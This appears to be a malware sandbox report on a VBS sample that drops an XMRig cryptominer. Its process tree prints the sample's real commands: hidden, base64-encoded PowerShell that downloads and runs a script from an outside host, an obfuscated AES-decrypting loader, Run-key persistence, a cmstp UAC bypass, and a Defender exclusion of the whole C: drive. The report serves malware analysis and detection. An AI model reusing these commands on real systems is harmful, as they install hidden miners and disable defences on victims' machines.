Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    59s
  • max time network
    52s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20250128-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20250128-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    31/01/2025, 01:38

General

  • Target

    sample.vbs

  • Size

    12.7MB

  • MD5

    f7650386857dd0d31fb2a1e984dfd3b5

  • SHA1

    f273746309e4dff543059ec934895108dd2b6244

  • SHA256

    acdcc9515147f1691ddb2c7cbd352a67ef6f0e57cb72ea593df2bd2fe01f0509

  • SHA512

    e8421e56ed514f38780d4c4d3261810c3b7374c3afad7016de0ef50905dba12d2661206162865da93ada5eeb733d9ed985fd2a4f205ee248a2ca3a3fa5607616

  • SSDEEP

    49152:BnxqEP6D/zp8K91y5+30k5xTZq+4+EtVGnKTSB4IpQsBtK+gvA9hZKwPBdko9cgD:C

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Power Settings 1 TTPs 5 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious use of AdjustPrivilegeToken 35 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3596
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\sample.vbs"
        2⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:3792
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3984
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\c.bat"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3260
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -noprofile -windowStyle Hidden -ep bypass -command "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aWV4IChJbnZva2UtV2ViUmVxdWVzdCAtVXJpICJodHRwczovLzB4MC5zdC84WDVULnBzMSIp')))"
              5⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1732
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\osltg2f4\osltg2f4.cmdline"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:4600
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA633.tmp" "c:\Users\Admin\AppData\Local\Temp\osltg2f4\CSCD90FF0FD210941DBBE49B25FDA6C82F.TMP"
                  7⤵
                    PID:4340
                • C:\windows\system32\cmstp.exe
                  "C:\windows\system32\cmstp.exe" /au C:\windows\temp\e2qjqc4z.inf
                  6⤵
                    PID:4572
                • C:\Windows\system32\reg.exe
                  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "dwm" /t REG_SZ /d "C:\Users\Admin\dwm.bat" /f
                  5⤵
                  • Adds Run key to start application
                  PID:60
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hiDDen -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3T2k4dk1UVTJMakkxTXk0eU5UQXVOakk2TlRBd01DOWtiM2R1Ykc5aFpDOUhaVzVsY21GMFpXUlRZM0pwY0hRdWNITXhJaWs9JykpKTtlbXB0eXNlcnZpY2VzIC1ldHc7U3RhcnQtU2xlZXAgLVNlY29uZHMgMTA7ZnVuY3Rpb24gZ2VjdGltY2RnYmpsb2x6a2lxcmptaGN0aHhxeHpnbW51ZWtiaW5hbigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0JFMEw2aUN3N3crTnBhVzcwNktsZ01UN3pxMkZHYXlReFkrWElkaHA4SEE9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OignZ25pcnRTNDZlc2FCbW9yRidbLTEuLi0xNl0gLWpvaW4gJycpKCdmNGV6a1NJa2RhN1Ewcmk5R2VtSVF3PT0nKTsJJGRlY3J5cHRvcl92YXI9JGFlc192YXIuQ3JlYXRlRGVjcnlwdG9yKCk7CSRyZXR1cm5fdmFyPSRkZWNyeXB0b3JfdmFyLlRyYW5zZm9ybUZpbmFsQmxvY2soJHBhcmFtX3ZhciwgMCwgJHBhcmFtX3Zhci5MZW5ndGgpOwkkZGVjcnlwdG9yX3Zhci5EaXNwb3NlKCk7CSRhZXNfdmFyLkRpc3Bvc2UoKTsJJHJldHVybl92YXI7fWZ1bmN0aW9uIGZqbXNjcXVhYmZ3b2NjYXpjaW1rdmVlenB3cmtheGN2cWRkZHZrcXIoJHBhcmFtX3Zhcil7CUlFWCAnJGRwd3RreGtyZWx6emFxc2FmbWRneWt6ZGQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFBQUJCQkNDQ2VtQUFBQkJCQ0NDb3JBQUFCQkJDQ0N5U0FBQUJCQkNDQ3RyQUFBQkJCQ0NDZWFBQUFCQkJDQ0NtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FBQUJCQkNDQycsICcnKTsJSUVYICckYXl6eXhkcnN1Z2dpa3BybHpmcHljdWFsZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5BQUFCQkJDQ0NNQUFBQkJCQ0NDZUFBQUJCQkNDQ21BQUFCQkJDQ0NvQUFBQkJCQ0NDckFBQUJCQkNDQ3lBQUFCQkJDQ0NTQUFBQkJCQ0NDdEFBQUJCQkNDQ3JBQUFCQkJDQ0NlQUFBQkJCQ0NDYUFBQUJCQkNDQ21BQUFCQkJDQ0M7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJHhqaGt0dHB0cWp6bHRoaGhoZ2psc3Z3bHU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FBQUJCQkNDQ29tQUFBQkJCQ0NDcHJBQUFCQkJDQ0NlQUFBQkJCQ0NDc3NBQUFCQkJDQ0Npb0FBQUJCQkNDQ24uQUFBQkJCQ0NDR1pBQUFCQkJDQ0NpcEFBQUJCQkNDQ1N0QUFBQkJCQ0NDcmVBQUFCQkJDQ0NhbUFBQUJCQkNDQygkZHB3dGt4a3JlbHp6YXFzYWZtZGd5a3pkZCwgW0lPLkNBQUFCQkJDQ0NvbUFBQUJCQkNDQ3ByQUFBQkJCQ0NDZXNBQUFCQkJDQ0NzaUFBQUJCQkNDQ29uQUFBQkJCQ0NDLkNvQUFBQkJCQ0NDbXBBQUFCQkJDQ0NyZUFBQUJCQkNDQ3NzQUFBQkJCQ0NDaUFBQUJCQkNDQ29BQUFCQkJDQ0NuQUFBQkJCQ0NDTW9kZV06OkRBQUFCQkJDQ0NlQUFBQkJCQ0NDY0FBQUJCQkNDQ29tcEFBQUJCQkNDQ3JlQUFBQkJCQ0NDc3MpOycuUmVwbGFjZSgnQUFBQkJCQ0NDJywgJycpOwkkeGpoa3R0cHRxanpsdGhoaGhnamxzdndsdS5Db3B5VG8oJGF5enl4ZHJzdWdnaWtwcmx6ZnB5Y3VhbGQpOwkkeGpoa3R0cHRxanpsdGhoaGhnamxzdndsdS5EaXNwb3NlKCk7CSRkcHd0a3hrcmVsenphcXNhZm1kZ3lremRkLkRpc3Bvc2UoKTsJJGF5enl4ZHJzdWdnaWtwcmx6ZnB5Y3VhbGQuRGlzcG9zZSgpOwkkYXl6eXhkcnN1Z2dpa3BybHpmcHljdWFsZC5Ub0FycmF5KCk7fWZ1bmN0aW9uIGFhd2ZqaGN5cG1yZ2ZzcWdraGlhaG5zdG1iam1hcWZmdGxuKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewkJSUVYICckeWZrZWFmeW91enVraWJucXB0Z3NhZnhpcXZvcXpsYm12cHVuZm9xZD1bU3lzdGVtLlJBQUFCQkJDQ0NlQUFBQkJCQ0NDZmxBQUFCQkJDQ0NlY3RBQUFCQkJDQ0Npb0FBQUJCQkNDQ24uQUFBQkJCQ0NDQXNBQUFCQkJDQ0NzZUFBQUJCQkNDQ21iQUFBQkJCQ0NDbEFBQUJCQkNDQ3lBQUFCQkJDQ0NdOjpMQUFBQkJCQ0NDb0FBQUJCQkNDQ2FBQUFCQkJDQ0NkQUFBQkJCQ0NDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJGF4eWhueHpmdnZjYnF0dXNoYm5lcmhvanlob3NoemthZGNyY2hwdXN3anVkaWF3Y3ZiPSR5ZmtlYWZ5b3V6dWtpYm5xcHRnc2FmeGlxdm9xemxibXZwdW5mb3FkLkFBQUJCQkNDQ0VBQUFCQkJDQ0NuQUFBQkJCQ0NDdEFBQUJCQkNDQ3JBQUFCQkJDQ0N5QUFBQkJCQ0NDUEFBQUJCQkNDQ29BQUFCQkJDQ0NpQUFBQkJCQ0NDbkFBQUJCQkNDQ3RBQUFCQkJDQ0M7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJGF4eWhueHpmdnZjYnF0dXNoYm5lcmhvanlob3NoemthZGNyY2hwdXN3anVkaWF3Y3ZiLkFBQUJCQkNDQ0lBQUFCQkJDQ0NuQUFBQkJCQ0NDdkFBQUJCQkNDQ29BQUFCQkJDQ0NrQUFBQkJCQ0NDZUFBQUJCQkNDQygkbnVsbCwgJHBhcmFtMl92YXIpOycuUmVwbGFjZSgnQUFBQkJCQ0NDJywgJycpO30kbHpwaWprZmVjcGJtdnBsdnVybnlhYWlsbSA9ICRlbnY6VVNFUk5BTUU7JG5lYnBrbnZqa2Fmb2N4eHh2Y2d2cnZld3kgPSAnQzpcVXNlcnNcJyArICRsenBpamtmZWNwYm12cGx2dXJueWFhaWxtICsgJ0FBQUJCQkNDQ1xBQUFCQkJDQ0NkQUFBQkJCQ0NDd0FBQUJCQkNDQ21BQUFCQkJDQ0MuQUFBQkJCQ0NDYkFBQUJCQkNDQ2FBQUFCQkJDQ0N0QUFBQkJCQ0NDJy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbmVicGtudmprYWZvY3h4eHZjZ3ZydmV3eTskcHdkbWo9W1N5c3RlbS5JTy5GaWxlXTo6KCd0eGVUbGxBZGFlUidbLTEuLi0xMV0gLWpvaW4gJycpKCRuZWJwa252amthZm9jeHh4dmNndnJ2ZXd5KS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkcXJ3IGluICRwd2RtaikgewlpZiAoJHFydy5TdGFydHNXaXRoKCc6OicpKQl7CQkkcmFmcXY9JHFydy5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kYWZ4YWRhaGt6cnJocmx1bmFtYmlyZG90endkcWN0dGpwZ249W3N0cmluZ1tdXSRyYWZxdi5TcGxpdCgnXCcpO0lFWCAnJGZmdWFwZ3ltYW5uYXlnYWdtaWhjeHFlYmh3cWhmeWhza3lvPWZqbXNjcXVhYmZ3b2NjYXpjaW1rdmVlenB3cmtheGN2cWRkZHZrcXIgKGdlY3RpbWNkZ2JqbG9semtpcXJqbWhjdGh4cXh6Z21udWVrYmluYW4gKFtBQUFCQkJDQ0NDQUFBQkJCQ0NDb0FBQUJCQkNDQ25BQUFCQkJDQ0N2QUFBQkJCQ0NDZUFBQUJCQkNDQ3J0XTo6QUFBQkJCQ0NDRkFBQUJCQkNDQ3JBQUFCQkJDQ0NvQUFBQkJCQ0NDbUFBQUJCQkNDQ0JBQUFCQkJDQ0NhQUFBQkJCQ0NDc2U2QUFBQkJCQ0NDNEFBQUJCQkNDQ1NBQUFCQkJDQ0N0QUFBQkJCQ0NDcmlBQUFCQkJDQ0NuQUFBQkJCQ0NDZ0FBQUJCQkNDQygkYWZ4YWRhaGt6cnJocmx1bmFtYmlyZG90endkcWN0dGpwZ25bMF0pKSk7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7SUVYICckaWdsbWJzcW9nbHZma2NuaGJoZHBvYXNzc3BxaGNmdnB6cnI9Zmptc2NxdWFiZndvY2NhemNpbWt2ZWV6cHdya2F4Y3ZxZGRkdmtxciAoZ2VjdGltY2RnYmpsb2x6a2lxcmptaGN0aHhxeHpnbW51ZWtiaW5hbiAoW0FBQUJCQkNDQ0NBQUFCQkJDQ0NvQUFBQkJCQ0NDbkFBQUJCQkNDQ3ZBQUFCQkJDQ0NlQUFBQkJCQ0NDckFBQUJCQkNDQ3RdOjpBQUFCQkJDQ0NGQUFBQkJCQ0NDckFBQUJCQkNDQ29BQUFCQkJDQ0NtQUFBQkJCQ0NDQkFBQUJCQkNDQ2FBQUFCQkJDQ0NzQUFBQkJCQ0NDZUFBQUJCQkNDQzZBQUFCQkJDQ0M0QUFBQkJCQ0NDU0FBQUJCQkNDQ3RyQUFBQkJCQ0NDaUFBQUJCQkNDQ25BQUFCQkJDQ0NnKCRhZnhhZGFoa3pycmhybHVuYW1iaXJkb3R6d2RxY3R0anBnblsxXSkpKTsnLlJlcGxhY2UoJ0FBQUJCQkNDQycsICcnKTthYXdmamhjeXBtcmdmc3Fna2hpYWhuc3RtYmptYXFmZnRsbiAkZmZ1YXBneW1hbm5heWdhZ21paGN4cWViaHdxaGZ5aHNreW8gJG51bGw7YWF3ZmpoY3lwbXJnZnNxZ2toaWFobnN0bWJqbWFxZmZ0bG4gJGlnbG1ic3FvZ2x2ZmtjbmhiaGRwb2Fzc3NwcWhjZnZwenJyICgsW3N0cmluZ1tdXSAoJyVBQUFCQkJDQ0MnKSk7')) | Invoke-Expression"
                  5⤵
                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:2336
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
            2⤵
            • Power Settings
            • Suspicious use of WriteProcessMemory
            PID:4636
            • C:\Windows\System32\powercfg.exe
              powercfg /x -hibernate-timeout-ac 0
              3⤵
              • Power Settings
              • Suspicious use of AdjustPrivilegeToken
              PID:4820
            • C:\Windows\System32\powercfg.exe
              powercfg /x -hibernate-timeout-dc 0
              3⤵
              • Power Settings
              • Suspicious use of AdjustPrivilegeToken
              PID:4460
            • C:\Windows\System32\powercfg.exe
              powercfg /x -standby-timeout-ac 0
              3⤵
              • Power Settings
              • Suspicious use of AdjustPrivilegeToken
              PID:3592
            • C:\Windows\System32\powercfg.exe
              powercfg /x -standby-timeout-dc 0
              3⤵
              • Power Settings
              • Suspicious use of AdjustPrivilegeToken
              PID:1944
          • C:\Windows\explorer.exe
            C:\Windows\explorer.exe
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1904
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe
          1⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1508
        • C:\Windows\system32\taskkill.exe
          taskkill /IM cmstp.exe /F
          1⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:880

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          3KB

          MD5

          3eb3833f769dd890afc295b977eab4b4

          SHA1

          e857649b037939602c72ad003e5d3698695f436f

          SHA256

          c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

          SHA512

          c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          39ad01207ab66ca033816b2ad1adbb9e

          SHA1

          0fc7a5bba6583a49e22587f43013fa17bab612e3

          SHA256

          47fc0e0ca67b16f3b165a4ac3b5bb899c65e693ea3f604e4f4d9b64ac0300c11

          SHA512

          5efbb3c7cccdf3233bb42e214d09b56df7d5c7f3178b0f5cf1ac90a609a381d201d826cd3cda8d17e10bbcb4207a0563bfcad72ac2564fdc62383588e77f493b

        • C:\Users\Admin\AppData\Local\Temp\RESA633.tmp

          Filesize

          1KB

          MD5

          31acf67f660e89987560231ed0b3c3b3

          SHA1

          620fe347c4409ef13a071716f0c9c99f681cb702

          SHA256

          15523897d0bcc243b61d494a17fd403dd2db23e84d3701c49f2381e7e7d56ea0

          SHA512

          e50e97fce229e053682c9f60e4a76e7072a0ce4c9fe7211f66b96d87c910c128b0e301817a48817e86dd0c0e9c52e155243fbd8f79d015341abc49fac39fb12e

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5phaxqx5.4ph.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Local\Temp\c.bat

          Filesize

          12.7MB

          MD5

          7a1c7d3da7cf792dda3fcb171347daa1

          SHA1

          fb4f7291f1e8c2d807f34e2e43f2bfa343f219a1

          SHA256

          f03344def4aff1dafd24bd5a4e5c6e505a92a1c30c6bf3d11de9fea8cf187a39

          SHA512

          bf3372f65d5019d08804ac0a5d2df16a25e7d11670f2bfdd332ca83d4e34fae5ca752a34b3158e1bafda34e018a3a4d0dcc64fbf6cff6326fa2ea916d4d44d21

        • C:\Users\Admin\AppData\Local\Temp\osltg2f4\osltg2f4.dll

          Filesize

          4KB

          MD5

          7e02ad525aabf88486d3cedbb7365da2

          SHA1

          30fb32c13aeae64d0148c51c51931ea408b2dd93

          SHA256

          5175bea7fd9c3753997e908bbbc6ce155482b2d681b20c15e147a610c20ef05e

          SHA512

          801256e59ccefb246e8a8c5abfc2ef7e5d72f0ebc90703291c61c04f975af53b38a9021d63395db6b98cb4291bed7f10790a71fa669cfc3e990398afeb7c8a7a

        • C:\windows\temp\e2qjqc4z.inf

          Filesize

          667B

          MD5

          05662b83ff7db6317e391454787598d8

          SHA1

          d290d661e282eb757a5292fe5ee8f2f8517232ab

          SHA256

          0322b78214d9fb1d40d9bf162a44f9a5fe13fcb21c96b8b0f0e289e939a9fa5c

          SHA512

          f1b302c58804c79e350cd2f30a2f08f762551cc8790ed3f0b877efd8915996587734afe9f0b4185cfbbcf589aa9b04762dd80d9d8141a5bf647de692299161e9

        • \??\c:\Users\Admin\AppData\Local\Temp\osltg2f4\CSCD90FF0FD210941DBBE49B25FDA6C82F.TMP

          Filesize

          652B

          MD5

          7bab585262f358be0f923e26388aa2ed

          SHA1

          c48304c5267a012e259c8f001754eb0873c29a53

          SHA256

          633e4aee3f1508c41d639c6fb7f24d25c5365e531aa033118227b3e8be88f111

          SHA512

          311738d757a4c31e328aa3cf3a5772d0024a5c25e8c466f243db000709475489a6e3665dc785a1754b1451ed84ce064419d24bd417bcc0c741e0a36ef4066d60

        • \??\c:\Users\Admin\AppData\Local\Temp\osltg2f4\osltg2f4.0.cs

          Filesize

          2KB

          MD5

          b126ac3da39ffa35cb857267cbc70cbb

          SHA1

          59dbfa9af3f2fa2c3bda0118ef779c0238675721

          SHA256

          6e6dd39153a84b94b4f309a4c4521260cbdd8a6922ade46096f42da39bc20b93

          SHA512

          c15d8ef56529792b983d55736c283ad6ae5c95bcd661053292f95c51f535109e4c59cf391e1c724be97e52ee4bfa213a380021f51c4e576201c03cfc4647acbc

        • \??\c:\Users\Admin\AppData\Local\Temp\osltg2f4\osltg2f4.cmdline

          Filesize

          369B

          MD5

          b151668ed608523cab531efbf73de4fe

          SHA1

          18ae84ca823013a21fbf764e24e921960729ffb4

          SHA256

          773e74283b66b9de30848080f3afd75c163bd71f0d7c828923740c6913973cb2

          SHA512

          1801d72f09fc50e6864fd28901c815a273937d300028ef3f542f11820b7e2fa3ad09580650c992eed2191378dcb2b656cfb9cf86f882305ecf59410cd544bce8

        • memory/1732-36-0x000001AA4AB30000-0x000001AA4AB38000-memory.dmp

          Filesize

          32KB

        • memory/1732-54-0x00007FFC8CCD0000-0x00007FFC8D792000-memory.dmp

          Filesize

          10.8MB

        • memory/1732-20-0x00007FFC8CCD0000-0x00007FFC8D792000-memory.dmp

          Filesize

          10.8MB

        • memory/1732-23-0x000001AA4AB60000-0x000001AA4AB7C000-memory.dmp

          Filesize

          112KB

        • memory/1732-8-0x000001AA30140000-0x000001AA30162000-memory.dmp

          Filesize

          136KB

        • memory/1732-19-0x00007FFC8CCD0000-0x00007FFC8D792000-memory.dmp

          Filesize

          10.8MB

        • memory/1732-53-0x00007FFC8CCD3000-0x00007FFC8CCD5000-memory.dmp

          Filesize

          8KB

        • memory/1732-21-0x000001AA4B1E0000-0x000001AA4B986000-memory.dmp

          Filesize

          7.6MB

        • memory/1732-18-0x00007FFC8CCD0000-0x00007FFC8D792000-memory.dmp

          Filesize

          10.8MB

        • memory/1732-7-0x00007FFC8CCD3000-0x00007FFC8CCD5000-memory.dmp

          Filesize

          8KB

        • memory/1732-58-0x00007FFC8CCD0000-0x00007FFC8D792000-memory.dmp

          Filesize

          10.8MB

        • memory/1904-76-0x0000000000D10000-0x0000000000D30000-memory.dmp

          Filesize

          128KB

        • memory/1904-77-0x00007FF7D23E0000-0x00007FF7D2C20000-memory.dmp

          Filesize

          8.2MB

        • memory/2336-70-0x0000019F20000000-0x0000019F20008000-memory.dmp

          Filesize

          32KB

        • memory/2336-71-0x0000019F20010000-0x0000019F20998000-memory.dmp

          Filesize

          9.5MB

        • memory/2336-72-0x0000019F10000000-0x0000019F11000000-memory.dmp

          Filesize

          16.0MB